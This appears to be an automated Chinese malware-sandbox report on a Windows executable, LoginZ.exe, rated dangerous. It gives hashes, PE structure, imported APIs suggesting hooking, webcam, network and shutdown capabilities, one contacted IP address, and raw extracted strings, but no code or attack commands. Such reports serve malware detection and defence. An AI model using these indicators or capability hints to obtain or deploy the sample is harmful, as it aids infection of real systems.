比较分析...

分析任务

分析类型 虚拟机标签 开始时间 结束时间 持续时间
文件 (Windows) win7-sp1-x64-hpdapp03-1 2017-03-16 21:37:17 2017-03-16 21:39:43 146 秒

魔盾分数

10.0

危险的

文件详细信息

文件名 LoginZ.exe
文件大小 2805760 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
MD5 66229fcde650f8671f0058bf9962c358
SHA1 45713d1ae867d9fe2b3727c31513e426da1cf724
SHA256 1e92d42bc6fb2fceaac740e4e11c47091efbdfa86ae69d666eccb640b7979476
SHA512 82c09cdc063a80e7dce1f93aea9931c1df8ec2dab3933ff7fc230db2c3da159cfcc0060170991126b85446a1af0f61924ae97e5268a2ad5f5f068606d6924b6f
CRC32 2BB554EA
Ssdeep 24576:4yacmnB3Z2ihx4o1r/HtTl6tCA8XTTv8/ib+G1RzV1E6UnFXlJYMoZsgUlFNaEeu:4wWnp/yttTEaRYtsgUhK1HdoMY5/mo
Yara 登录查看Yara规则
样本下载 提交误报
登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

直接 IP 安全评级 地理位置
121.41.83.121 中国

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

摘要

登录查看详细行为信息

PE 信息

初始地址 0x00400000
入口地址 0x005357f0
声明校验值 0x00000000
实际校验值 0x002bb182
最低操作系统版本要求 4.0
编译时间 2017-02-09 16:13:24
载入哈希 a73b0be0fb7ecf9b208d71b4c7b3255c
图标
图标精确哈希值 faf73fb49142c5105af36402865d6548
图标相似性哈希值 c387a5dbc4b03f3f1cce95edb2ace2f1

PE 数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x0015dbd2 0x0015e000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.58
.rdata 0x0015f000 0x000da244 0x000db000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 6.37
.data 0x0023a000 0x00073f6a 0x00023000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.34
.rsrc 0x002ae000 0x0004fb28 0x00050000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.21

资源

名称 偏移量 大小 语言 子语言 熵(Entropy) 文件类型
TEXTINCLUDE 0x002aede0 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
TEXTINCLUDE 0x002aede0 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
TEXTINCLUDE 0x002aede0 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
RT_CURSOR 0x002af2d0 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x002af2d0 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x002af2d0 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x002af2d0 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x002b0b44 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_ICON 0x002fb750 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL 5.74 GLS_BINARY_LSB_FIRST
RT_MENU 0x002fbbc4 0x00000284 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 4.28 data
RT_MENU 0x002fbbc4 0x00000284 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 4.28 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x002fce0c 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x002fd854 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_GROUP_CURSOR 0x002fd8a0 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR 0x002fd8a0 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR 0x002fd8a0 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_ICON 0x002fd944 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON 0x002fd944 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON 0x002fd944 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_MANIFEST 0x002fd958 0x000001cd LANG_NEUTRAL SUBLANG_NEUTRAL 5.08 XML 1.0 document, ASCII text, with very long lines, with no line terminators

导入

库: WINMM.dll:
0x55f7d0 midiStreamOut
0x55f7d8 midiStreamProperty
0x55f7dc midiStreamOpen
0x55f7e4 waveOutOpen
0x55f7e8 waveOutRestart
0x55f7ec mciSendStringA
0x55f7f8 waveOutWrite
0x55f7fc waveOutPause
0x55f800 waveOutReset
0x55f804 waveOutClose
0x55f808 midiStreamStop
0x55f80c midiOutReset
0x55f810 midiStreamClose
0x55f814 midiStreamRestart
0x55f818 waveOutGetNumDevs
库: WS2_32.dll:
0x55f830 sendto
0x55f834 socket
0x55f838 htonl
0x55f83c bind
0x55f840 htons
0x55f844 WSAAsyncSelect
0x55f848 closesocket
0x55f84c recvfrom
0x55f850 select
0x55f854 WSACleanup
0x55f858 WSAStartup
0x55f85c gethostbyname
0x55f860 inet_ntoa
0x55f864 inet_addr
0x55f868 ioctlsocket
0x55f86c connect
0x55f870 recv
0x55f874 listen
0x55f878 getpeername
0x55f87c accept
0x55f880 __WSAFDIsSet
0x55f884 ntohs
0x55f888 gethostname
0x55f88c getsockname
0x55f890 send
0x55f894 ntohl
库: VERSION.dll:
0x55f79c VerLanguageNameA
库: RASAPI32.dll:
0x55f4e0 RasHangUpA
库: KERNEL32.dll:
0x55f1b8 SetLastError
0x55f1c4 GetLocaleInfoA
0x55f1c8 GetVersion
0x55f1cc SetSystemPowerState
0x55f1d0 WideCharToMultiByte
0x55f1d4 GetTempFileNameA
0x55f1dc IsDBCSLeadByte
0x55f1e0 MultiByteToWideChar
0x55f1e4 lstrcmpiA
0x55f1e8 lstrcpynA
0x55f1ec UnmapViewOfFile
0x55f1f0 MapViewOfFile
0x55f1f4 CreateFileMappingA
0x55f1f8 FlushViewOfFile
0x55f1fc TerminateThread
0x55f200 CreateMutexA
0x55f204 ReleaseMutex
0x55f208 SuspendThread
0x55f20c GetStartupInfoA
0x55f210 GetOEMCP
0x55f214 GetCPInfo
0x55f218 GetProcessVersion
0x55f21c SetErrorMode
0x55f220 GlobalFlags
0x55f224 GetCurrentThread
0x55f228 GetFileTime
0x55f22c TlsGetValue
0x55f230 LocalReAlloc
0x55f234 TlsSetValue
0x55f238 TlsFree
0x55f23c GlobalHandle
0x55f240 TlsAlloc
0x55f244 LocalAlloc
0x55f248 GlobalGetAtomNameA
0x55f24c GlobalAddAtomA
0x55f250 GlobalFindAtomA
0x55f254 GlobalDeleteAtom
0x55f258 GetThreadLocale
0x55f25c SetEndOfFile
0x55f260 UnlockFile
0x55f264 LockFile
0x55f268 FlushFileBuffers
0x55f26c DuplicateHandle
0x55f274 FormatMessageA
0x55f278 LocalFree
0x55f284 GetSystemDirectoryA
0x55f28c OpenProcess
0x55f290 TerminateProcess
0x55f294 GetCurrentProcess
0x55f298 GetFileSize
0x55f29c SetFilePointer
0x55f2a4 Process32First
0x55f2a8 Process32Next
0x55f2ac CreateSemaphoreA
0x55f2b0 ResumeThread
0x55f2b4 ReleaseSemaphore
0x55f2c0 GetProfileStringA
0x55f2c4 WriteFile
0x55f2c8 ReadFile
0x55f2d0 CreateFileA
0x55f2d4 SetEvent
0x55f2d8 FindResourceA
0x55f2dc LoadResource
0x55f2e0 LockResource
0x55f2e4 lstrlenW
0x55f2e8 RemoveDirectoryA
0x55f2ec GetModuleFileNameA
0x55f2f0 GetCurrentThreadId
0x55f2f4 ExitProcess
0x55f2f8 GlobalSize
0x55f2fc GlobalFree
0x55f308 lstrcatA
0x55f30c lstrlenA
0x55f310 WinExec
0x55f314 lstrcpyA
0x55f318 FindNextFileA
0x55f31c GlobalReAlloc
0x55f320 HeapFree
0x55f324 HeapReAlloc
0x55f328 GetProcessHeap
0x55f32c HeapAlloc
0x55f330 GetUserDefaultLCID
0x55f334 GetFullPathNameA
0x55f338 FreeLibrary
0x55f33c LoadLibraryA
0x55f340 GetLastError
0x55f344 GetVersionExA
0x55f34c CreateThread
0x55f350 CreateEventA
0x55f354 Sleep
0x55f35c GlobalAlloc
0x55f360 GlobalLock
0x55f364 GlobalUnlock
0x55f368 GetTempPathA
0x55f36c FindFirstFileA
0x55f370 FindClose
0x55f374 GetFileAttributesA
0x55f378 MoveFileA
0x55f37c DeleteFileA
0x55f380 CopyFileA
0x55f384 CreateDirectoryA
0x55f390 GetModuleHandleA
0x55f394 GetProcAddress
0x55f398 MulDiv
0x55f39c GetCommandLineA
0x55f3a0 GetTickCount
0x55f3a4 InterlockedExchange
0x55f3a8 CreateProcessA
0x55f3ac WaitForSingleObject
0x55f3b0 CloseHandle
0x55f3b4 RtlUnwind
0x55f3b8 GetSystemTime
0x55f3bc GetLocalTime
0x55f3c0 RaiseException
0x55f3c4 GetFileType
0x55f3c8 HeapSize
0x55f3cc GetACP
0x55f3d0 SetStdHandle
0x55f3e8 SetHandleCount
0x55f3ec GetStdHandle
0x55f3f4 HeapDestroy
0x55f3f8 HeapCreate
0x55f3fc VirtualFree
0x55f404 LCMapStringA
0x55f408 LCMapStringW
0x55f40c VirtualAlloc
0x55f410 IsBadWritePtr
0x55f418 GetStringTypeA
0x55f41c GetStringTypeW
0x55f420 GetCurrentProcessId
0x55f424 CompareStringA
0x55f428 CompareStringW
0x55f42c IsBadReadPtr
0x55f430 IsBadCodePtr
0x55f434 IsValidLocale
0x55f438 IsValidCodePage
0x55f43c EnumSystemLocalesA
0x55f440 GetLocaleInfoW
0x55f444 lstrcmpA
库: USER32.dll:
0x55f4f8 ReleaseCapture
0x55f4fc SetTimer
0x55f500 KillTimer
0x55f504 WinHelpA
0x55f508 LoadBitmapA
0x55f50c CopyRect
0x55f514 ScreenToClient
0x55f518 GetCapture
0x55f51c PostThreadMessageA
0x55f520 GetNextDlgGroupItem
0x55f524 LoadStringA
0x55f528 GetMessagePos
0x55f52c SetWindowRgn
0x55f534 GetWindow
0x55f538 GetActiveWindow
0x55f53c SetFocus
0x55f540 IsIconic
0x55f544 PeekMessageA
0x55f548 SetMenu
0x55f54c GetMenu
0x55f550 DeleteMenu
0x55f554 GetSystemMenu
0x55f558 DefWindowProcA
0x55f55c GetClassInfoA
0x55f560 IsZoomed
0x55f564 PostQuitMessage
0x55f56c GetKeyState
0x55f574 IsWindowEnabled
0x55f578 ShowWindow
0x55f580 LoadImageA
0x55f588 SetCapture
0x55f58c GetScrollRange
0x55f590 SetScrollRange
0x55f594 SetScrollPos
0x55f598 SetRect
0x55f59c InflateRect
0x55f5a0 IntersectRect
0x55f5a4 DestroyIcon
0x55f5a8 PtInRect
0x55f5ac OffsetRect
0x55f5b0 IsWindowVisible
0x55f5b4 EnableWindow
0x55f5b8 ClientToScreen
0x55f5bc GetWindowLongA
0x55f5c0 SetWindowLongA
0x55f5c4 GetSysColor
0x55f5c8 SetActiveWindow
0x55f5cc SetCursorPos
0x55f5d0 MapDialogRect
0x55f5d8 CharNextA
0x55f5e0 GetMenuState
0x55f5e4 SetMenuItemBitmaps
0x55f5e8 CheckMenuItem
0x55f5ec MoveWindow
0x55f5f0 IsDialogMessageA
0x55f5f4 ScrollWindowEx
0x55f5f8 SendDlgItemMessageA
0x55f5fc MapWindowPoints
0x55f600 AdjustWindowRectEx
0x55f604 GetScrollPos
0x55f608 RegisterClassA
0x55f60c GetMenuItemCount
0x55f610 GetMenuItemID
0x55f614 CreateWindowExA
0x55f618 GetClassLongA
0x55f61c SetPropA
0x55f620 GetPropA
0x55f624 RemovePropA
0x55f628 GetMessageTime
0x55f62c GetLastActivePopup
0x55f634 GetWindowPlacement
0x55f638 GetNextDlgTabItem
0x55f63c EndDialog
0x55f644 LoadCursorA
0x55f648 SetCursor
0x55f64c EnableMenuItem
0x55f650 GetSubMenu
0x55f654 GetDlgCtrlID
0x55f65c CreateMenu
0x55f660 ModifyMenuA
0x55f664 AppendMenuA
0x55f668 CreatePopupMenu
0x55f66c DrawIconEx
0x55f67c SetRectEmpty
0x55f680 DispatchMessageA
0x55f684 GetDC
0x55f688 GetMessageA
0x55f68c FillRect
0x55f690 IsRectEmpty
0x55f694 ReleaseDC
0x55f698 IsChild
0x55f69c DestroyMenu
0x55f6a0 SetForegroundWindow
0x55f6a4 GetWindowRect
0x55f6a8 EqualRect
0x55f6ac UpdateWindow
0x55f6b0 ValidateRect
0x55f6b4 InvalidateRect
0x55f6b8 GetClientRect
0x55f6bc GetFocus
0x55f6c0 GetParent
0x55f6c4 GetTopWindow
0x55f6c8 PostMessageA
0x55f6cc IsWindow
0x55f6d0 SetParent
0x55f6d4 DestroyCursor
0x55f6d8 SendMessageA
0x55f6dc SetWindowPos
0x55f6e0 MessageBeep
0x55f6e4 MessageBoxA
0x55f6e8 GetCursorPos
0x55f6ec GetSystemMetrics
0x55f6f0 EmptyClipboard
0x55f6f4 SetClipboardData
0x55f6f8 OpenClipboard
0x55f6fc GetClipboardData
0x55f700 CloseClipboard
0x55f704 wsprintfA
0x55f708 WaitForInputIdle
0x55f70c WindowFromPoint
0x55f710 DrawFocusRect
0x55f714 DrawEdge
0x55f718 UnregisterClassA
0x55f71c DrawFrameControl
0x55f720 TranslateMessage
0x55f724 LoadIconA
0x55f728 GetKeyboardLayout
0x55f72c GetDesktopWindow
0x55f730 GetClassNameA
0x55f738 FindWindowA
0x55f73c GetDlgItem
0x55f740 GetWindowTextA
0x55f744 GetForegroundWindow
0x55f748 ExitWindowsEx
0x55f74c SetWindowTextA
0x55f750 DestroyWindow
0x55f754 CharUpperA
0x55f758 DrawTextA
0x55f75c SetWindowsHookExA
0x55f760 UnhookWindowsHookEx
0x55f768 EnumChildWindows
0x55f76c CallNextHookEx
0x55f770 CallWindowProcA
0x55f774 GetWindowDC
0x55f778 GetSysColorBrush
0x55f77c FrameRect
0x55f780 RedrawWindow
0x55f784 EnumThreadWindows
0x55f788 BeginPaint
0x55f78c EndPaint
0x55f790 TabbedTextOutA
0x55f794 GrayStringA
库: GDI32.dll:
0x55f04c ExtSelectClipRgn
0x55f050 ExcludeClipRect
0x55f054 GetClipBox
0x55f05c GetDeviceCaps
0x55f060 GetTextColor
0x55f064 CreateRoundRectRgn
0x55f068 CreateEllipticRgn
0x55f06c PathToRegion
0x55f070 EndPath
0x55f074 BeginPath
0x55f078 GetWindowOrgEx
0x55f07c GetViewportOrgEx
0x55f080 GetWindowExtEx
0x55f084 GetDIBits
0x55f088 RealizePalette
0x55f08c SelectPalette
0x55f090 StretchBlt
0x55f094 CreatePalette
0x55f09c CreateDIBitmap
0x55f0a0 DPtoLP
0x55f0a4 SelectClipRgn
0x55f0a8 CreatePolygonRgn
0x55f0ac GetClipRgn
0x55f0b0 SetStretchBltMode
0x55f0b4 SetPixel
0x55f0bc SetBkColor
0x55f0c0 GetViewportExtEx
0x55f0c4 SetBkMode
0x55f0c8 LineTo
0x55f0cc MoveToEx
0x55f0d0 SetTextColor
0x55f0d8 GetTextMetricsA
0x55f0dc ScaleWindowExtEx
0x55f0e0 SetWindowExtEx
0x55f0e4 SetWindowOrgEx
0x55f0e8 ScaleViewportExtEx
0x55f0ec SetViewportExtEx
0x55f0f0 OffsetViewportOrgEx
0x55f0f4 SetViewportOrgEx
0x55f0f8 SetMapMode
0x55f0fc SetROP2
0x55f100 SetPolyFillMode
0x55f104 RestoreDC
0x55f108 LPtoDP
0x55f10c Rectangle
0x55f110 Ellipse
0x55f114 CreateCompatibleDC
0x55f118 GetPixel
0x55f11c BitBlt
0x55f120 StartPage
0x55f124 StartDocA
0x55f128 DeleteDC
0x55f12c EndDoc
0x55f130 EndPage
0x55f134 GetObjectA
0x55f138 GetStockObject
0x55f13c CreateFontIndirectA
0x55f140 CreateSolidBrush
0x55f144 FillRgn
0x55f148 CreateRectRgn
0x55f14c CombineRgn
0x55f150 PatBlt
0x55f154 CreatePen
0x55f158 SelectObject
0x55f15c CreatePatternBrush
0x55f160 CreateBitmap
0x55f164 CreateHatchBrush
0x55f168 CreateBrushIndirect
0x55f16c CreateDCA
0x55f174 GetPolyFillMode
0x55f178 GetStretchBltMode
0x55f17c GetROP2
0x55f180 SaveDC
0x55f184 PtVisible
0x55f188 RectVisible
0x55f18c TextOutA
0x55f190 ExtTextOutA
0x55f194 Escape
0x55f198 GetMapMode
0x55f19c GetCurrentObject
0x55f1a0 Arc
0x55f1a4 RoundRect
0x55f1a8 GetBkColor
0x55f1ac DeleteObject
0x55f1b0 GetBkMode
库: MSIMG32.dll:
0x55f44c GradientFill
库: WINSPOOL.DRV:
0x55f820 OpenPrinterA
0x55f824 DocumentPropertiesA
0x55f828 ClosePrinter
库: ADVAPI32.dll:
0x55f000 RegCloseKey
0x55f00c RegCreateKeyExA
0x55f010 GetUserNameA
0x55f014 OpenProcessToken
0x55f018 RegQueryValueA
0x55f01c RegCreateKeyA
0x55f020 RegSetValueExA
0x55f024 RegOpenKeyExA
0x55f028 RegQueryValueExA
库: SHELL32.dll:
0x55f4ec Shell_NotifyIconA
0x55f4f0 ShellExecuteA
库: ole32.dll:
0x55f8c0 CoRevokeClassObject
0x55f8c4 OleFlushClipboard
0x55f8d0 CLSIDFromProgID
0x55f8d4 CoGetClassObject
0x55f8d8 OleRun
0x55f8dc CoCreateInstance
0x55f8e0 CLSIDFromString
0x55f8e4 OleUninitialize
0x55f8e8 OleInitialize
0x55f8ec CoTaskMemFree
0x55f8f0 CoTaskMemAlloc
库: OLEAUT32.dll:
0x55f480 VariantClear
0x55f484 VariantChangeType
0x55f488 SafeArrayGetUBound
0x55f48c SafeArrayGetLBound
0x55f490 SafeArrayGetDim
0x55f498 SafeArrayAccessData
0x55f49c SafeArrayGetElement
0x55f4a0 VariantCopyInd
0x55f4a4 VariantInit
0x55f4a8 SysAllocStringLen
0x55f4ac SysStringLen
0x55f4b4 SysAllocString
0x55f4b8 SafeArrayCreate
0x55f4bc SysFreeString
0x55f4c0 UnRegisterTypeLib
0x55f4c8 LoadTypeLib
0x55f4cc LHashValOfNameSys
0x55f4d0 RegisterTypeLib
0x55f4d4 VariantCopy
库: COMCTL32.dll:
0x55f03c ImageList_Destroy
0x55f040 None
0x55f044 _TrackMouseEvent
库: oledlg.dll:
0x55f8f8 None
库: WININET.dll:
0x55f7a8 InternetCrackUrlA
0x55f7ac HttpOpenRequestA
0x55f7b0 HttpSendRequestA
0x55f7b4 HttpQueryInfoA
0x55f7b8 InternetConnectA
0x55f7bc InternetSetOptionA
0x55f7c0 InternetOpenA
0x55f7c4 InternetCloseHandle
0x55f7c8 InternetReadFile
库: AVICAP32.dll:
库: MSVFW32.dll:
0x55f454 ICOpen
0x55f458 ICCompressorFree
0x55f460 ICSendMessage
0x55f468 ICClose
0x55f46c DrawDibClose
0x55f470 DrawDibEnd
库: comdlg32.dll:
0x55f89c ChooseColorA
0x55f8a0 GetFileTitleA
0x55f8a4 GetSaveFileNameA
0x55f8a8 GetOpenFileNameA
.text
`.rdata
@.data
.rsrc
3hNKV
3h`JV
(hVTV
(h0UV
(hBUV
(hUUV
(hgUV
(huUV
(h|UV
(h?VV
3h>TV
3hNKV
3hk W
3hk W
3hk W
3hk W
3hk W
3hk W
3hSOV
(h6'W
(hv'W
(h{'W
3h_VV
(hn(W
4hw(W
(h5)W
(h;)W
(h\UV
(h#UV
(h7UV
(hIUV
(hO)W
(hX)W
(hb)W
(hj)W
3h5JV
D$$@r`
D$(Dr`
D$(@r`
D$(@r`
D$(@r`
D$<@r`
D$P@r`
D$0@r`
D$0@r`
D$D@r`
8`}<j
T$hVj
DRQPj
T$|Vj
T$th
|$TVj
|$`Vj
D$@Sj
L$8h
D$8Rj
l$<VWj
T$ Rj
L$4S+L$0Qj
Rh ^b
T$$Rh0^b
}'h
D$dhp,d
9^xu5j
T$,Qj
T$0Pj
D$8RPj
D$0h
T$,Qj
NpRQj
t$<Vj
T$<h
D$(hF
D$(h
T$Dhb
@WWWh
@WWWh
L$POj
L$PMj
D$Ph
D$|h
T$ Wj
L$@RQj
D$@RPQj
D$ Pj
D$4Wj
D$8Wj
A=(7d
T$Dh
D$0Rj
T$\h
Vhd@d
RWhTAd
D$Lh
NTRPQj
L$$hpBd
ujh@Bd
Vh0yH
L$XhLOd
D$(Sj
T$XhpMd
L$XhHMd
T$Xh Md
D$ RPUhD
QUh(Rd
WjdjdPQh
Ph\Td
Ph|Td
tLhPVd
D$0Pj
D$0Qj
D$TPj
D$4Qj
D$@Rj
D$xPj
u!h0Xd
trhPWd
t4h([d
u7h$]d
RQhXbd
\$\}-j
VpPRj
L$ RUPj
L$$Pj
zhTzd
u#hHzd
!h0zd
Ph zd
t?hTxd
t?h@xd
t?hTxd
t?h@xd
t?hTxd
t?h@xd
D$XSj
SVWPh({d
\$`h4{d
QhH{d
Rh4|d
Sh`^b
8`}<j
D$(Uj
O hhuh
L$hh
RhdbS
F0hX0c
QhdbS
L$ RUPj
\$4VWh
|$TVj
DQRPj
8`}<j
D$ Bj
T$ Aj
D$ Jj
D$<Ph
T$(h4Mj
T$ h4Mj
D$Th4Mj
T$(hDMj
D$Hh4Mj
D$Lh4Mj
T$ hDMj
D$0hDMj
D$(hDMj
D$,hDMj
VpPRj
txhd'e
u6h\)e
Phx)e
u&hd,e
t hL,e
u h0,e
u3hP-e
tjh4-e
uGhD.e
t!h,.e
u?hD/e
tHh(/e
L$ RUPj
Vh,De
PQhtDe
PQhTDe
PQh,Fe
RVPh(Ee
PRQhPFe
QSRh(Ee
VhxHe
Wh8He
VhxHe
PhxHe
D$@h8He
PhxHe
T$<Ph<Ie
T$4Rj
u!h Je
T$(Qj
u!h Je
T$$Rj
t$ Wh
RhHKe
u&Vh(Le
QRhLLe
WhXQe
Wh|Qe
WRPhXRe
T$(PQhXSe
VHRhxUe
t%h0Pe
RhHVe
PhLXe
Qh|Xe
Rh0Ye
Rh0Ye
RhlYe
Php[e
Phpbe
WPh8ce
Qhtce
QRhtfe
D$@Rj
QRh<ge
Uhthe
PPhdhe
tQhXhe
O&Qh|ge
PRSQPRhdie
QhTje
Qhlle
FVhlle
Qh8le
Qhpme
QRh4me
Rhpme
Qhpme
t=hpoe
PPh@oe
t_h4kb
tNh$kb
(hdkb
Rh ^b
Qh ^b
Rh ^b
Rh ^b
QQSVWj
SVWUj
F*PjTWj
F+PjUWj
F,PjVWj
F-PjWWj
F.PjRWj
VjSWj
@hQcT
Wh^}T
~\j$j
tBSh|,U
Wj(_Wj
Yt&hlgb
~<j j
VhJHU
tBSh|,U
VWhJHU
VhJHU
u@hJHU
WhXlb
WhDlb
tShxlb
!hJHU
w]hJHU
tBSh|,U
tBSh|,U
tBSh|,U
Wh2LU
Wh2LU
~`j,j
VhTnU
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
wininet.dll
kernel32.dll
kernel32.dll
avicap32.dll
rasapi32.dll
kernel32.dll
rasapi32.dll
kernel32.dll
rasapi32.dll
kernel32
rasapi32.dll
